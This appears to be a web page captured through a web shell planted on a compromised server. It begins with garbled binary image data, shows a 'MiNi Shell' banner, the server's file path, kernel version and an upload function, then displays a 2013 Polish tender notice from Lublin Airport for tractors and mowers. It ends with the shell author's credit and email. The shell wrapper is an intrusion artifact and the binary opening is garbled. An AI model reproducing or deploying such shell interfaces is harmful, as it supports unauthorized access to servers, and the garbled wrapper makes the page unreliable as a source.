JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130604/213806-N-2013.html

<p class="kh_header"><b>Lublin: Dostawa fabrycznie nowego sprzętu rolniczego na potrzeby Portu Lotniczego Lublin S.A.</b><br>
<b>Numer ogłoszenia: 213806 - 2013; data zamieszczenia: 04.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Port Lotniczy Lublin S.A. , ul. Hempla 6, 20-008 Lublin, woj. lubelskie, tel. 81 534 74 40, faks 81 534 74 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.portlotniczy.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: działalność portów lotniczych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowego sprzętu rolniczego na potrzeby Portu Lotniczego Lublin S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa sprzętu rolniczego na potrzeby Portu Lotniczego Lublin S.A.

Część I- dostawa fabrycznie nowych sprzętu rolniczego:- ciągnik rolniczy (2 szt.)

Część II- dostawa fabrycznie nowej kosiarki z koszem do zamontowania na ciągniku rolniczym ( 1 szt.)

Część III- dostawa fabrycznie nowej kosiarki z rozdrabniaczem do zamontowania na ciągniku rolniczym (2 szt.)
2. Zakres zamówienia obejmuje:

2.1.Dostarczenie do pojazdów pełnej dokumentacji technicznej w języku polskim 
2.1.1. Dokumentacja ciągników powinna być dostarczona w j. polskim i umożliwiać ich rejestrację bez dodatkowych badań i testów oraz prawidłową eksploatację.
2.1.2.. Przyjęcie dokumentacji, po jej analizie i akceptacji przez zamawiającego
2.2. przeprowadzenie testów sprawdzających pojazdów i urządzeń poprzedzające podpisanie protokołu odbioru końcowego;
2.3.Gwarancja i serwis ciągników i kosiarek - min. 12 miesięcy, licząc od daty jego przyjęcia przez zamawiającego.
2.3.1.Z chwilą wymiany zespołu lub części w ramach gwarancji, następuje automatyczne przedłużenie gwarancji odpowiednio na ten wyrób, zespół lub część, na okres wyszczególniony w pp. a) powyżej. 
2.3.2.Gwarancja dotycząca serwisu gwarancyjnego sprzętu - loko PL Lublin, będzie zapewniona w czasie od daty zgłoszenia usterki:
przyjazd serwisu do 12 godzin,
usunięcie uszkodzenia 48 godzin,
przy dłuższym czasie naprawy niż 48 godzin, maszyna zastępcza.
Okres gwarancji na oferowany przedmiot zamówienia winien wynosić minimum 12 miesiące. 
2.4.świadczenie w okresie gwarancyjnym pełnego serwisu wraz z przeprowadzeniem
przeglądów okresowych i konserwacji zgodnie z dokumentami gwarancyjnymi (w cenie
niniejszego zamówienia);
2.5.Wykonawca przeszkoli 6 przedstawicieli zamawiającego, w uzgodnionym terminie, w zakresie bezpiecznej obsługi wyrobu. Miejsce szkolenia PL Lublin.
2.6.Wykonawca gwarantuje spełnienie wymagań rejestracyjnych obowiązujących w dniu dostawy.
2.6.1.Wyrób będzie wyposażony w elementy takie jak, trójkąt ostrzegawczy, gaśnica oraz apteczkę pierwszej pomocy i niezbędny zestaw kluczy.
2.7. Silniki jezdne i robocze zamawianych urządzeń powinny spełniać wymagania norm emisji spalin aktualne w dniu dostawy. Pojazdy powinny posiadać homologację tam gdzie to wymagane lub decyzję zwalniającą z uzyskania świadectwa homologacji. Urządzenia powinny posiadać odpowiednie dokumenty potwierdzające spełnienie wymagań.
2.8. Kosiarki powinny być kompatybilne z ciągnikiem rolniczym opisanym w załączniku nr 1 A (a) do SIWZ.
Wymagany zestaw parametrów technicznych przedmiotu zamówienia zawiera ZAŁĄCZNIK NR 1 A (a,b,c).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 16.31.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> dla części I: 7 500,00 złotych (siedem tysięcy pięćset złotych)
dla części II: 1000 złotych (jeden tysiąc złotych)
dla części III: 1 400 złotych (jeden tysiąc czterysta złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert ( jeżeli ten okres jest krótszy- w tym okresie) należycie:
a) dla części I: co najmniej dwóch dostaw ciągnika rolniczego o wartości 150 000,00 złotych każdy
b) dla części II: co najmniej jednej dostawy kosiarki o parametrach wymaganych niniejszym postępowaniem
c) dla części III: co najmniej jednej dostawy kosiarki o parametrach wymaganych niniejszym postępowaniem</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1. Wykaz winien wskazywać wykonanie dostaw: dla części I: co najmniej dwóch ciągników rolniczych o wartości dostawy co najmniej 150 000,00 PLN brutto każdy, dla części II: co najmniej jednej dostawy kosiarki o parametrach wymaganych niniejszym postępowaniem, dla części III: co najmniej jednej dostawy kosiarki o parametrach wymaganych niniejszym postępowaniem
2. Złożone poświadczenia winny potwierdzać należyte wykonanie dla części I: co najmniej dwóch ciągników rolniczych o wartości dostawy co najmniej 150 000,00 PLN brutto każdy, dla części II: co najmniej jednej dostawy kosiarki o parametrach wymaganych niniejszym postępowaniem, dla części III: co najmniej jednej dostawy kosiarki o parametrach wymaganych niniejszym postępowaniem;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - termin realizacji - 20</li>
<li>3 - parametry techniczne - 10</li>
<li>4 - serwis - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający przewiduje możliwość ewentualnej zmiany postanowień niniejszej umowy jeśli wystąpią niżej wymienione okoliczności mające wpływ na realizację Przedmiotu zamówienia:
2.1.zmniejszenie zakresu Przedmiotu zamówienia, gdy jego wykonanie w pierwotnym
zakresie nie leży w interesie publicznym, z jednoczesnym zmniejszeniem wynagrodzenia;
2.2. zmiana terminu realizacji Przedmiotu zamówienia, w przypadku :
a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie publicznym,
b) działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie,
c) konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie dostawy.
3. Zmiany umowy przewidziane w ust. 2 dopuszczalne są na następujących warunkach:
- ad pkt 2.1.) - zmniejszenie zakresu Przedmiotu zamówienia w granicach uzasadnionego interesu publicznego wraz ze zmniejszeniem wynagrodzenia o wartość niezrealizowanej części zamówienia,
- ad pkt 2.2.)
lit. a) - w zakresie uzasadnionego interesu publicznego,
lit. b) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
lit. c) - o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień.
4. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.portlotniczy.lublin.pl (zakładka bip)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Port Lotniczy Lublin S.A. ul. Króla Jana III Sobieskiego 1, 21-040 Świdnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2013 godzina 12:00, miejsce: Port Lotniczy Lublin S.A. ul. Króla Jana III Sobieskiego 1, 21-040 Świdnik, Recepcja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny dla Województwa Lubelskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa fabrycznie nowego sprzętu rolniczego na potrzeby Portu Lotniczego Lublin S.A.- ciągniki rolnicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa sprzętu rolniczego na potrzeby Portu Lotniczego Lublin S.A.
Część I- dostawa fabrycznie nowych sprzętu rolniczego: ciągnik rolniczy (2 szt.)
2.Zakres zamówienia obejmuje:
2.1.Dostarczenie do pojazdów pełnej dokumentacji technicznej w języku polskim 
2.1.1. Dokumentacja ciągników powinna być dostarczona w j. polskim i umożliwiać ich rejestrację bez dodatkowych badań i testów oraz prawidłową eksploatację.
2.1.2.. Przyjęcie dokumentacji, po jej analizie i akceptacji przez zamawiającego
2.2. przeprowadzenie testów sprawdzających pojazdów i urządzeń poprzedzające podpisanie protokołu odbioru końcowego;
2.3.Gwarancja i serwis ciągników i kosiarek - min. 12 miesięcy, licząc od daty jego przyjęcia przez zamawiającego.
2.3.1.Z chwilą wymiany zespołu lub części w ramach gwarancji, następuje automatyczne przedłużenie gwarancji odpowiednio na ten wyrób, zespół lub część, na okres wyszczególniony w pp.2.3 powyżej. 
2.3.2.Gwarancja dotycząca serwisu gwarancyjnego sprzętu - loko PL Lublin, będzie zapewniona w czasie od daty zgłoszenia usterki:
przyjazd serwisu do 12 godzin,
usunięcie uszkodzenia 48 godzin,
przy dłuższym czasie naprawy niż 48 godzin, maszyna zastępcza.
Okres gwarancji na oferowany przedmiot zamówienia winien wynosić minimum 12 miesiące. 

2.4.świadczenie w okresie gwarancyjnym pełnego serwisu wraz z przeprowadzeniem
przeglądów okresowych i konserwacji zgodnie z dokumentami gwarancyjnymi (w cenie niniejszego zamówienia);

2.5.Wykonawca przeszkoli 6 przedstawicieli zamawiającego, w uzgodnionym terminie, w zakresie bezpiecznej obsługi wyrobu. Miejsce szkolenia PL Lublin.

2.6.Wykonawca gwarantuje spełnienie wymagań rejestracyjnych obowiązujących w dniu dostawy.

2.6.1.Wyrób będzie wyposażony w elementy takie jak, trójkąt ostrzegawczy, gaśnica oraz apteczkę pierwszej pomocy i niezbędny zestaw kluczy.
2.7. Silniki jezdne i robocze zamawianych urządzeń powinny spełniać wymagania norm emisji spalin aktualne w dniu dostawy. Pojazdy powinny posiadać homologację tam gdzie to wymagane lub decyzję zwalniającą z uzyskania świadectwa homologacji. Urządzenia powinny posiadać odpowiednie dokumenty potwierdzające spełnienie wymagań.
Wymagany zestaw parametrów technicznych przedmiotu zamówienia zawiera ZAŁĄCZNIK NR A (a).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. termin realizacji - 20</li>
<li>3. parametry techniczne - 10</li>
<li>4. serwis - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa fabrycznie nowego sprzętu rolniczego na potrzeby Portu Lotniczego Lublin S.A.- dostawa fabrycznie nowej kosiarki z koszem do zamontowania na ciągniku rolniczym ( 1 szt.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa sprzętu rolniczego na potrzeby Portu Lotniczego Lublin S.A.
dostawa fabrycznie nowej kosiarki z koszem do zamontowania na ciągniku rolniczym ( 1 szt.)
2.Zakres zamówienia obejmuje:
2.1. Dokumentacja kosiarek powinna być dostarczona w j. polskim i umożliwiać ich rejestrację bez dodatkowych badań i testów oraz prawidłową eksploatację.
2.1.1. Przyjęcie dokumentacji, po jej analizie i akceptacji przez zamawiającego
2.2. Przeprowadzenie testów sprawdzających pojazdów i urządzeń poprzedzające podpisanie protokołu odbioru końcowego;
2.3.Gwarancja i serwis i kosiarki - min. 12 miesięcy, licząc od daty jego przyjęcia przez zamawiającego.
2.3.1.Z chwilą wymiany zespołu lub części w ramach gwarancji, następuje automatyczne przedłużenie gwarancji odpowiednio na ten wyrób, zespół lub część, na okres wyszczególniony w pp.2.3 powyżej. 
2.3.2.Gwarancja dotycząca serwisu gwarancyjnego sprzętu - loko PL Lublin, będzie zapewniona w czasie od daty zgłoszenia usterki:
przyjazd serwisu do 12 godzin,
usunięcie uszkodzenia 48 godzin,
przy dłuższym czasie naprawy niż 48 godzin, maszyna zastępcza.
Okres gwarancji na oferowany przedmiot zamówienia winien wynosić minimum 12 miesiące. 

2.4.świadczenie w okresie gwarancyjnym pełnego serwisu wraz z przeprowadzeniem
przeglądów okresowych i konserwacji zgodnie z dokumentami gwarancyjnymi (w cenie niniejszego zamówienia);

2.5.Wykonawca przeszkoli 6 przedstawicieli zamawiającego, w uzgodnionym terminie, w zakresie bezpiecznej obsługi wyrobu. Miejsce szkolenia PL Lublin.
2.6. Kosiarka powinna być kompatybilne z ciągnikiem rolniczym opisanym w załączniku nr 1 A (a) do SIWZ.

Wymagany zestaw parametrów technicznych przedmiotu zamówienia zawiera ZAŁĄCZNIK NR 1 A (b).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.31.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. termin realizacji - 20</li>
<li>3. parametry techniczne - 10</li>
<li>4. serwis - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa fabrycznie nowego sprzętu rolniczego na potrzeby Portu Lotniczego Lublin S.A.- dostawa fabrycznie nowej kosiarki z rozdrabniaczem do zamontowania na ciągniku rolniczym (2 szt.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa sprzętu rolniczego na potrzeby Portu Lotniczego Lublin S.A.-dostawa fabrycznie nowej kosiarki z rozdrabniaczem do zamontowania na ciągniku rolniczym (2 szt.)
2.Zakres zamówienia obejmuje:
2.1. Dokumentacja kosiarek powinna być dostarczona w j. polskim i umożliwiać ich rejestrację bez dodatkowych badań i testów oraz prawidłową eksploatację.
2.1.1. Przyjęcie dokumentacji, po jej analizie i akceptacji przez zamawiającego
2.2. Przeprowadzenie testów sprawdzających pojazdów i urządzeń poprzedzające podpisanie protokołu odbioru końcowego;
2.3.Gwarancja i serwis kosiarek - min. 12 miesięcy, licząc od daty jego przyjęcia przez zamawiającego.
2.3.1.Z chwilą wymiany zespołu lub części w ramach gwarancji, następuje automatyczne przedłużenie gwarancji odpowiednio na ten wyrób, zespół lub część, na okres wyszczególniony w pp.2.3 powyżej. 
2.3.2.Gwarancja dotycząca serwisu gwarancyjnego sprzętu - loko PL Lublin, będzie zapewniona w czasie od daty zgłoszenia usterki:
przyjazd serwisu do 12 godzin,
usunięcie uszkodzenia 48 godzin,
przy dłuższym czasie naprawy niż 48 godzin, maszyna zastępcza.
Okres gwarancji na oferowany przedmiot zamówienia winien wynosić minimum 12 miesiące. 
2.4.świadczenie w okresie gwarancyjnym pełnego serwisu wraz z przeprowadzeniem
przeglądów okresowych i konserwacji zgodnie z dokumentami gwarancyjnymi (w cenie niniejszego zamówienia);
2.5.Wykonawca przeszkoli 6 przedstawicieli zamawiającego, w uzgodnionym terminie, w zakresie bezpiecznej obsługi wyrobu. Miejsce szkolenia PL Lublin.
2.6. Kosiarki powinny być kompatybilne z ciągnikiem rolniczym opisanym w załączniku nr 1 A (a) do SIWZ.
Wymagany zestaw parametrów technicznych przedmiotu zamówienia zawiera ZAŁĄCZNIK NR 1 A (c).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.31.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. termin realizacji - 20</li>
<li>3. parametry techniczne - 10</li>
<li>4. serwis - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com